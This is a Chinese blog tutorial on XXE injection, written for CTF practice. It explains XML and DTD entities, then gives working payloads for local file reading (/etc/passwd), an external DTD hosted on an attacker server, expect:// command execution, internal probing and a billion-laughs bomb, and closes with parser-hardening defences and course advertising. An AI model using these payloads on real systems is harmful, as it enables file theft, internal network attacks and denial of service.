XXE注入

最新推荐文章于 2024-07-18 14:42:15 发布

程序员肉肉

最新推荐文章于 2024-07-18 14:42:15 发布

阅读量835

点赞数 18

文章标签：网络 http 数据库安全 web安全

本文链接：https://blog.csdn.net/yy1715713348/article/details/140063570

版权

前言：

    XXE漏洞经常出现在CTF中，一直也没有系统的学习过，今天就来总结一波。

文章目录

- - 一、XXE 漏洞是什么：
  - 二、XML基础知识：
  - - 1、XML是什么？
    - 2、XML文档结构：
    - - DTD声明方式：
      - 1、内部DTD声明：
        2、外部DTD声明：
      - 实体的声明：
      - 实体的分类：
      - 1、按声明位置分（和上面的内外部引入 DTD声明不同，别弄混了）：
        2、按类型分：
  - 三、如何利用XXE：
  - 四、XXE漏洞常见的危害：
  - - 1、任意文件读取：
    - 2、命令执行：
    - 3、内网探测：
    - 4、攻击内网网站：
    - 5、发起Dos攻击：
  - 五、XXE 如何防御：
  - - - 方式一、使用开发语言提供的禁用外部实体的方法：
      - 方式二、过滤用户输入：
  - 最后

一、XXE 漏洞是什么：

XXE 漏洞全称：XML External Entity Injection，即 XML 外部实体注入漏洞。XXE 漏洞发生在应用程序解析 XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件和代码，造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起 Dos攻击等危害。
在这里插入图片描述

二、XML基础知识：

想要了解 XXE漏洞，需要先了解一下关于 XML的基础知识。

1、XML是什么？

XML全称：可扩展标记语言（Extensible Markup Language）。
XML是独立于软件和硬件的信息传输工具，它把数据从HTML中分离。 XML语言没有预定义的标签，需要作者定义自己的标签和自己的文档结构。
XML 被设计用来传输和存储数据，HTML 被设计用来显示数据。

2、XML文档结构：

XML文档结构包括：

XML声明
DTD 文档类型定义（可选）
文档元素。

示例代码：
在这里插入图片描述
其中 DTD (Document Type Definition）即 文档类型定义 部分定义了XML文档的标签以及元素属性。

如上图中的DTD 就定义了XML的根元素为 note，然后根元素下面有一些子元素 (to,from,heading,body)，那么下面的文档元素就可以使用这些元素：

<!--文档元素-->
<note> 
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body> 
</note>

注：

PCDATA：可被解析的字符数据。PCDATA 数据类型是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理，而实体会被展开。与之对应的是CDATA
CDATA：不被解析的字符数据，CDATA 数据类型是不会被解析器解析的文本，在这些文本中的标签不会被当作标记来对待，其中的实体也不会被展开。详细可点这链接

DTD声明方式：

其中DTD有两种构建方式，分别为内部 DTD声明和外部 DTD声明。

1、内部DTD声明：

声明格式：

<!DOCTYPE 根元素 [元素声明]>

如上例使用就是内部 DTD声明。

2、外部DTD声明：

通过引入 dtd文件的方式进行声明（这一点和 css，javascript 很像）。

声明格式：

<!DOCTYPE 根元素 SYSTEM "文件名">

例：

<?xml version="1.0"?>
 <!DOCTYPE note SYSTEM "test.dtd"> 
 <note> 
 <to>H</to>
 <from>E</from>
 <head>L</head>
 <body>LO</body> 
 </note>

test.dtd：

<!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型--> 
<!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->

🆗，说完了 DTD的两种引入方式，终于到了关键人物：" 实体 " 登场了。

实体的声明：

实体定义在 DTD声明中，

例：

<?xml version="1.0"?>
<!DOCTYPE sss [
<!ELEMENT sss ANY >
<!ENTITY xxe "hello" >
]>

这里定义元素为 ANY 表示可以接受任何元素作为标签，这里的 "xxe" 就是我们所说的实体了（相当于一个变量），可以在XML文档元素中使用 & 符号对实体进行引用。

例：

<sss>
<user>&xxe;</user>
<pass>pass</pass>
</sss>

到时候输出的时候 &xxe; 就会被 hello 替换。

实体的分类：

1、按声明位置分（和上面的内外部引入 DTD声明不同，别弄混了）：

实体是定义在 DTD中的，可分为 外部实体 和 内部实体，上面的例子就是内部实体，外部实体就是把实体定义在外部文件中。

例：

<?xml version="1.0"?>
<!DOCTYPE sss [
<!ELEMENT sss ANY >
<!ENTITY xxe SYSTEM "file:///D:/test.dtd" > //引入外部dtd文件
]>
<sss>
    <user>&xxe;</user>
    <pass>pass</pass>
</sss>

这样当需要更改实体的值时，只需要更改外部的 dtd 文件就行，不需要打开源码更改了（降低了耦合性），但也带来了安全漏洞。

外部实体支持http、file等协议。不同程序支持的协议不同：
在这里插入图片描述

2、按类型分：

实体又分为通用实体和参数实体。

1、通用实体：

用 &实体名;引用，在DTD 中定义（内外DTD都行），在 XML文档元素中引用。

上面的例子都是通用实体。

2、参数实体：

使用 % 实体名(中间有空格) 在DTD中定义（内外DTD都行），并且只能在DTD中使用 %实体名; 引用。
在 DTD 文件中，参数实体的声明可以引用其他实体（参数实体和通用实体）。

引入格式：

内部引入：

<!ENTITY % 实体名称 "实体的值">

例：

<?xml version="1.0" encoding="utf-8">
<!DOCTYPE Author [
<!ENTITY % first "Hello">
<!ENTITY % second "%first;_World">
%second;]>

%second; 会解析为：Hello_World

外部引入：

<!ENTITY % 实体名称 SYSTEM "URI">

例：

<!DOCTYPE a [
<!ENTITY % name SYSTEM "file:///D:/test.dtd">
%name;]>

三、如何利用XXE：

说了这么多，终于来到了重点，正如标题 XXE名为 “外部实体注入”，也就是说时是通过引入外部实体的方式进行注入的。

我们先来看这个例子：

<?xml version="1.0"?>
<!DOCTYPE s [
<!ELEMENT s ANY >
<!ENTITY xxe SYSTEM "file:///D:/test.dtd" > 
]>
<s>
    <user>&xxe;</user>
    <pass>pass</pass>
</s>

既然能读 dtd文件，那是不是将路径换成敏感文件的路径，也能把敏感文件读出来？

例：

解析 xml 的php文件：

test.php:

<?php
    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;
?>

构造payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE A [  
<!ENTITY a SYSTEM "file:///c:/windows/system.ini"> ]> 
<A>&a;</A>

在这里插入图片描述可以看到，成功读取到了 C盘下的 system.ini 文件，此漏洞就是 任意文件读取漏洞。

四、XXE漏洞常见的危害：

1、任意文件读取：

构造任意文件读取漏洞 playload 有下面几种方法：

方式一、直接通过外部实体声明：

XML内容：

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE a [  
<!ENTITY b SYSTEM "file:///etc/passwd"> ]> 
<a>&b;</a>

上面的例子就是此方式，这是最简单的XXE漏洞利用。

方式二、外部实体声明（通用实体）+ 外部 DTD文件：

XML内容：

<?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://XXX/test.dtd">
<c>&b;</c>

注意：这里的 http://XXX/test.dtd 是攻击者自己服务器上的文件。

test.dtd 内容：

<!ENTITY b SYSTEM "file:///etc/passwd">

示例(使用的是 xxe-labs 靶场的php环境)：
在这里插入图片描述
因为这里使用windows演示的，所以读取的是 system.ini 文件，可以看到成功的读取到了。

方式三、外部实体声明（参数实体） + 引入外部实体声明：

因为参数实体可以嵌套别的实体，所以产生了这种方式。

<?xml version="1.0"?>
<!DOCTYPE a[
	<!ENTITY % d SYSTEM "http://XXX/test.dtd">
	%d;
]>
<c>&b;</c>

test.dtd 内容:

<!ENTITY b SYSTEM "file:///etc/passwd">

示例：
在这里插入图片描述注意这种方式必须要先引用参数实体，才能引用通用实体，且缺一不可。

2、命令执行：

在安装 expect扩展的PHP环境里执行系统命令，其他协议也有可能可以执行系统命令。
因为PHP的 expect 并不是默认安装扩展，所以命令执行比较难利用，但不排除有幸运的情况。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://cat /" >]>
<root>
<name>&xxe;</name>
</root>

3、内网探测：

XML 外部实体中是可以使用http://协议，可以利用该请求去探查内网。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]>
<root>
<name>&xxe;</name>
</root>

4、攻击内网网站：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]>
<root>
<name>&xxe;</name>
</root>

5、发起Dos攻击：

几乎所有可以控制服务器资源利用的东西，都可用于制造DOS攻击。通过XML外部实体注入，攻击者可以发送任意的HTTP请求，因为解析器会解析文档中的所有实体，所以如果实体声明层层嵌套的话，在一定数量上可以对服务器器造成DoS。

常见的XML炸弹：

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

攻击原理：XML解析器尝试解析该文件时，DTD中的实体会以指数级的数量级展开，lol 实体为 “lol” 字符串，然后一个 lol2 实体引用了 10 次 lol 实体，一个 lol3 实体引用了 10 次 lol2 实体，此时一个 lol3 实体就含有 10^2 个 “lol” 了，以此类推，lol9 实体含有 10^8 个 “lol” 字符串，所以这个1K不到的文件经过解析后会占用到3G的内存,可见有多恐怖，不过现代的服务器软硬件大多已经抵御了此类攻击。

防御XML炸弹的方法也很简单禁止DTD或者是限制每个实体的最大长度。

五、XXE 如何防御：

方式一、使用开发语言提供的禁用外部实体的方法：

PHP：

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python：

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方式二、过滤用户输入：

过滤用户提交的XML数据，关键词：<!DOCTYPE>、<!ENTITY>、SYSTEM、PUBLIC。

最后

🆗，关于 XXE漏洞的总结大致就这些了，后面遇到新的 XXE利用方式再补上。( •̀ ω •́ )✧

学习资料分享

当然，只给予计划不给予学习资料的行为无异于耍流氓，### 如果你对网络安全入门感兴趣，那么你点击这里👉CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

如果你对网络安全感兴趣，学习资源免费分享，保证100%免费！！！（嘿客入门教程）

👉网安（嘿客）全套学习视频👈

我们在看视频学习的时候，不能光动眼动脑不动手，比较科学的学习方法是在理解之后运用它们，这时候练手项目就很适合了。

👉网安（嘿客红蓝对抗）所有方向的学习路线👈

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

学习资料工具包

压箱底的好资料，全面地介绍网络安全的基础理论，包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等，将基础理论和主流工具的应用实践紧密结合，有利于读者理解各种主流工具背后的实现机制。

在这里插入图片描述

面试题资料

独家渠道收集京东、360、天融信等公司测试题！进大厂指日可待！
在这里插入图片描述

👉嘿客必备开发工具👈

工欲善其事必先利其器。学习嘿客常用的开发软件都在这里了，给大家节省了很多时间。

这份完整版的网络安全（嘿客）全套学习资料已经上传至CSDN官方，朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】

如果你对网络安全入门感兴趣，那么你点击这里👉CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享